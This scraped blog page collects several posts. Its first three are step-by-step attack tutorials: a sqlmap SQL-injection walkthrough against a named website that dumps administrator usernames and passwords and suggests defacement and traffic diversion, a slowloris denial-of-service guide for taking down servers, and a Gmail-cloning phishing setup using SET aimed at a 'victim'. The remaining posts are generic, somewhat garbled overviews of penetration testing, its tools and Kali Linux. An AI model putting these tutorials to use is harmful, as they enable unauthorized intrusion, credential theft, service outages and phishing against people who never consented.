Hacking Website with sqlmap on Backtrack Unknown rwxr-xr-x 0 17:01

Title	Hacking Website with sqlmap on Backtrack
Permission	rw-r--r--
Author	Unknown
Date and Time	17:01
Category
Share

Hacking website by sqlmap and backtrack.

This style by : http://realhackerspoint.blogspot.in

In this tutorial, we will learn how to Find a vulnerable Link in a website, Exploit that link by SQL Injection and taking total control over any website,This includes access to usernames and passwords database, defacing it, address forwarding and much more.This is the most powerful attack against any website and can create a word-wide mess if done for evil purposes.

So What are we waiting for ? Lets Begin ...

What Do We Need For This Attack ?

# Backtrack 5 (Would work On Windows Too,Just find a sql injecting software)

# SQLMAP - Automatic SQL injection and database takeover tool (Included in Backtrack)

# Internet Access

# Brains And Balls.

# Lots Of Time.

Step-1 : Finding A Vulnerable Link.

This Is the MOST difficult step in this step, because there are thousands of links in a website and only some of them are capable of SQL Injection, So How to do it ?

The trick for this is to dig in the website and look for anything that might have access to an outside server, 

We will use a scanner provided ny backtrack called "UniScan" which is good at finding vulnerable links.To Open It,Type This In your console (backtrack terminal) :

cd /pentest/web/uniscan && ./uniscan.pl

Follow the onscreen commands and run this tool to find the bug links,sure you can use other scanners.

Once you have found a link, check the link by adding (‘) ignore the brackets please, at the end of the link,

With an id or almost anything behind the php? and behind the = can be tested.
This is because we know it selected something from the database and this might be an entry point.

For Example :

Original "vulnerable" Link : http://www.waterufo.net/item.php?id=200

After adding the symbol : http://www.waterufo.net/item.php?id=200'

If a MySQL error occurs? Then it most likely is vulnerable to SQL Injection.

Example of a MySQL error:

You have an error in your SQL syntax; 

Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''

YAYY !

Step 2 : Starting and Setting Up SQLMap :

The SQLMap is the best sql injecting tool ever made, It is good for both beginners and experts, To start it, Type the below command in console :

cd /pentest/web/scanners/sqlmap

Once it has Started, Change this command to your requirements and press enter :

 ./sqlmap.py -u (your bug link here) --level 5 --risk 3 --dbs

This command will scan the full website by the help of your vulnerable link you inserted.
Now let the scan continue and wait for something like this :

If this appears, you have made you path inside that website, now press N to stop the scan cause we have already found and exploited the vulnerability.

Step 3 : Finding The Columns And Tables ( The Guess Game ) -

As we all know, the data on a website is stored in databases,inside that databases, there are tables and columns, and inside them are the required data.
Suppose my database is waterufo.net,and you have to change it as per your requirements, i'm just supposing so you can understand.We will now type this command to get the tables :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net

You will get something like this :

Now run this command to grab the columns :

/sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net 

it will display the columns in the table "fl_users",Something Like This :

Step 4 : Retrieving Usernames And Passwords -

To retrieve the column values, type --dump at the end of the previous query
For Example :

./sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump

You will be presented with the values stored in that columns, In my case, that was the list of Administrator Usernames And Passwords :

So now you have the administrator usernames and passwords, you can do a lot of things with it for example :

-> Shutdown The Website


-> Insert A Malicious Script In the website,


-> Divert their traffic to other place.


-> Write those Passwords on a brick and hit your Neighbors Kid.



Any of the above will do a lot of damage.

How to DDos attack to server on Backtrack Unknown rwxr-xr-x 0 16:51

Title	How to DDos attack to server on Backtrack
Permission	rw-r--r--
Author	Unknown
Date and Time	16:51
Category
Share

              This is a very quick and simple tutorial on performing a denial of service attack using the custom linux kernal Backtrack 5. If you do not have Backtrack for instructions. The first thing you will need is a file called slowloris.pl. This file can be downloaded into Backtrack from:  

HERE

Copy all the text and paste it into a Gedit document, save it as slowloris.pl to your desktop. Now you must find the IP of the server, you can do this many ways, search google for dns lookup, etc..

After that in terminal type:

Code:

cd Desktop/

Code:

./slowloris.pl -dns (ip of the server)

Now this may take a while, but this will take down many servers, you can also open other terminals and do the same thing to speed up the proccess.


SOME SERVERS ALSO HAVE A LOAD BALANCER, THIS WILL CAUSE THE DDOS NOT TO WORK !

For DDos attack do this with several computer 5-6 & u can take big websites down :)!! 

How to Get an Account Facebook With Web Clone in Backtrack Unknown rwxr-xr-x 0 04:00

Title	How to Get an Account Facebook With Web Clone in Backtrack
Permission	rw-r--r--
Author	Unknown
Date and Time	04:00
Category
Share

irst open your backtrack terminal and type ifconfig to check your IP 



Now Again Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4 “Tabnabbing Attack Method”.

In this option we will choose option 2 “Site Cloner”.

Enter the URL of the site you want to clone. In this case http://www.gmail.com and hit enter. SET will clone up the web site. And press return to continue.

Now convert your URL into Google URL using goo.gl and send this link address to your victim via Email or Chat.

Penetration Testing Methodologies Unknown rwxr-xr-x 0 22:29

Title	Penetration Testing Methodologies
Permission	rw-r--r--
Author	Unknown
Date and Time	22:29
Category
Share

In doing the penetration testing there is a methodology needed just as we do any other testing procedure. This methodology is needed to make sure that the process is right and the result of the testing is reliable and could be used in the future development of the tested system as well. There are many different methodologies of this particular testing that can be used by anyone doing this testing. All of the methodologies are issued by different department with different characteristics as well. On this article there would be some of the most common methodologies of testing penetration used by people in doing this testing procedure.

The first methodology in doing penetration testing that is commonly used by people is the USSAF methodology. The ISSAF is the flagship project of the OISSG with the latest version is the version 0.2 that is available for any industry need to do this testing. This methodology is the first one that provides such validation for the bottom up strategies of the security. The next famous methodology of this testing is the OSSTMM which is Open Source Security Testing Methodology Manual. This one is a peer-reviewed security metrics and tests methodology.

There are five channels available on this methodology in conducting the security test to maximize the result including the data & information controls and also security awareness level of the personnel as well. The last one is the Open Web Application Security Project or the OWASP. This is an open-source security application project of the OWASP community. This community provides methodologies, tools, technologies, documentations, and also articles related to the testing of security on a particular system. All of those three are the most commonly used methodologies in conducting the testing of the network or computer security system known as the penetration testing.

Best Penetration Testing Tools Unknown rwxr-xr-x 0 22:28

Title	Best Penetration Testing Tools
Permission	rw-r--r--
Author	Unknown
Date and Time	22:28
Category
Share

In doing the penetration testing there are penetration testing tools needed to make sure that the process is done smoothly and giving the best possible result out of it. There are so many available tools for this testing that you could choose to perform the testing procedure. Among those many tools available, there are some of the best tools that you can find on this article. The first one is the Acunetix which is available for you in free version and also paid version. This particular security testing tool has a client script engine analyzer that will generate very detailed security vulnerabilities and issues report. The latest version is version 8 that has new HTTP Denial of Service test module.

Second best penetration testing tools is the Aircrack-ng that offers you many tools to maximize the penetration testing that you are going to do. The tools provided by Aircrack-ng include airdecap-ng, airmon-ng, aireplay-ng, airtun-ng, airodump-ng, and a couple more. Each one of the tool will have different functionality with other tools. This Aircrak-ng has free security tool called as GUI interface just as many other tools for the penetration test.

Third tools of penetration testing that is considered being the best is the Cain & Abel or it often called simply as Cain. This one is mainly known as the tool to recover any password. The penetration tester could recover any password by getting into the network and cracking such encrypted password on the system. Although it is considered as the best tool for penetration testing this one is also known to have a script-kiddie characteristic as well. Getting the best tools in any activity is important to maximize the result. Therefore in conducting the penetration testing, you should consider choosing one of these best penetration testing tools to get the best result of the testing procedure.

More Things to Know About Penetration Testing Unknown rwxr-xr-x 0 22:26

Title	More Things to Know About Penetration Testing
Permission	rw-r--r--
Author	Unknown
Date and Time	22:26
Category
Share

The ultimate goal of the penetration testing is to find out all available security vulnerabilities on the system that is tested. Something is considered as vulnerability of the system whenever this thing could increase the possibility of any attacker to attack the security of the system and then gain access to the control of the system itself. The control of the system in a particular organization or group should never be obtained by anyone else but the owner or administrator for the safety of the organization. Most common things that are considered as the vulnerabilities of the system are software bugs, system design flaws, and also system configuration errors. These things could be more powerful threat to the system when they are all combined. Thus the testing penetration is needed to prevent such vulnerabilities to disturb the system.

People might have just wondering then about whom or what should conduct this penetration testing. Since the threats of the network or computer system are so many, almost any of you using computer or network system based should perform this particular type of testing. Nevertheless there are four most common ideas of the one that should perform the testing. First is the one of the organization or industry that has regulated data types. This usually the one deal with financial services such as credit-card data. Second is the one which is a product vendor with regulated client or customer. One example of this is a developer of web.

Third is the one that the systems have been hacked before and find out that the effect of the hack is terrible. Fourth is the one that simply think it would be better to test the security of the system before bad thing happen to the system itself. Those are four common ideas in relation to whom or what should perform this penetration testing.

Things to Consider in Doing the Penetration Testing Unknown rwxr-xr-x 0 22:25

Title	Things to Consider in Doing the Penetration Testing
Permission	rw-r--r--
Author	Unknown
Date and Time	22:25
Category
Share

There are two things that could make people look for any information related to the penetration testing. First, it could be that someone else suggests them to perform the testing just to make sure that their system is safe just before any attack occurred. Second, it could be that their system has been hacked or penetrated before so that they want to make sure their new established system is safe and hack proof. Either one is the reason, it is clear that this testing penetration is needed in any operation of such organization or anything using computer or network system.

Moreover there are a couple of things that you have to make sure in dealing with such penetration testing. This is an important thing to do therefore have to make sure that everything is at its best to guarantee its success. First, you have to ask your colleagues if they know such recommended vendor that could perform the testing. Second, once you find a vendor ask the vendor for some references of similar organizations as yours.

Third, ask the vendor for the similar testing projects that they have done previously. Fourth, ask the vendor for testing report of their previously done testing so that you could evaluate the report. Fifth, ask the vendor for the complete information of the staffs that are going to do the testing for you. You can also do some background check as well to make sure that the staff is qualified. Sixth, make sure to have an agreement on the testing that will be performed so that there would be no miscommunication during the testing. When you consider all of the things stated above before doing the testing for your system, you will be able to get the best possible outcome from the penetration testing.

The Importance of Penetration Testing Unknown rwxr-xr-x 0 22:24

Title	The Importance of Penetration Testing
Permission	rw-r--r--
Author	Unknown
Date and Time	22:24
Category
Share

There are reasons that penetration testing is important and valuable to do. First, this particular testing could determine such feasibility of attack vectors that are possible in attacking computer or network security system. Second, this testing could find out the high-risk vulnerabilities that are actually a result of low-risk vulnerabilities combination on a particular network or computer system. Third, this testing could show any possible vulnerabilities or threats that cannot be detected just by using automated vulnerability scanner software. Fourth, this testing could provide the result or impact of such attacks on the vulnerabilities on the computer or network system. Fifth, this testing could provide reasons to invest on the development of the more sophisticated network or computer system in the future. Those are the five reasons that make this testing penetration are very important to do.

Moreover, the penetration testing is a kind of testing that need to be done regularly on a system that is changed regularly as well. The process of the testing could simply derive into two different parts. The first part of the testing is by finding out the legal operations combinations lead to illegal operation. The first process could be done by leveraging some flaws and then shaping the payload so that it would be considered as a valid operation.

Second part is finding out the specific illegal operation that is often called as payloads as well. There are companies and organizations that keep such large database containing known exploits. There is a certificate for this testing known as the Certified Penetration Tester or CPT which is managed by the Information Assurance Certification Review Board of IACRB. The exam candidate of the penetration testing should pass multiple choice exam and practical exam which is a penetration test against some servers in a virtual environment to be certified by the IACRB.

What is Penetration Testing? Unknown rwxr-xr-x 0 22:24

Title	What is Penetration Testing?
Permission	rw-r--r--
Author	Unknown
Date and Time	22:24
Category
Share

The penetration testing is a particularly known method of computer and network security evaluation. Generally this testing is done by giving a simulation of attack on the computer or network that is tested. This particular method of testing the security of computer or network is known to be the oldest method used since the 1970s. The Department of Defense performed this particular testing in the 1970 in order to describe the weaknesses in the computer system at that time. Thus after the weaknesses described, the Department of Defense initiated the development of more secure computer systems thanks to the testing penetration.

The penetration testing involves the analysis of the computer system from any possible vulnerability available. These vulnerabilities could be caused by poor system configuration, hardware or software flaws, or technical countermeasures as well. This particular analysis is carried out of the possible attacker position which could involve more exploitation of the security vulnerabilities of the computer or the network.

The result of this testing then would be presented to the owner of the tested systems. The result of the test that is presented to the owner will have the security issues on it along with the effect of those issues to the organization using the system. The best solution for the issues is also stated on the result as well.

Once the owner of the computer or network system given the result of this particular testing, it is fully the owner’s rights to decide what to do the next. This testing is very widely used by many organizations to make sure that their computer or network system is safe before publicly exposed. Thus it is important for any new organization using computer or network on its operation to have the penetration testing first before doing any of its operation.

Kali Linux Review, The Linux Penetration Testing Distribution Unknown rwxr-xr-x 0 22:22

Title	Kali Linux Review, The Linux Penetration Testing Distribution
Permission	rw-r--r--
Author	Unknown
Date and Time	22:22
Category
Share

Kali Linux is a great successor to BackTrack. Many people loved Linux Penetration Distro/ Operating System that is aimed at penetration testers and security professionals. Read this following brief history of how Kali Linux came to be. Backtrack is very familiar around the last seven years. It is created and managed by Offensive Security.

Kali Linux is different for the fine folks over at Offensive Security,  when solving the ‘inherent problems’ of BackTrack the authors needed a complete re-write. The problem is too many pentesting tools embedded within BackTrack all struggled to co-exist within the dependencies.  BackTrack v1-v5 that a headache for dependencies. Many penetrating and security tools where not regularly updated by their creators so the result was that trying to update the entire OS often caused conflicts and tools would  stop working, crash or even cause other tools to crash. For example is Ettercap which was not updated for a long time.

For solving the problem we can rebuild the distro bottom-up by making Kali Debian based. Before with BackTrack there was a /pentest/ folder.  Now, it all updated and managed by Debian packages.

Kali Linux has 300 tools which automatically work within the Kali ecosphere. Kali also has been created with the clean "File system Hierarchy Standard" and offers vast plug and play wireless support, with the only exception appearing to be broadcom.

Another interesting feature about Kali Linux is that it is supported with ARM architecture so you can use the distro on Raspberry Pi’s and Chromebooks etc. You can also create your own  file with Kali through the Debian lifebuild feature.

For summary, Kali is a well thought out penetration testing distribution which had to address its’ previous problems with regards to updates. It has two modes: forensics and default, all of which run best in gnome. All the usual pentesting tools work with the distro with ease and the file hierarchy is the same as previous BackTrack versions. For pentesting Kali Linux is clearly an awesome OS with the world’s best pentesting suite of tools that can all be preconfigured. Couple that with the very large and loyal community, bug tracking service and attention to detail. It is a solid pentesting Linux distribution.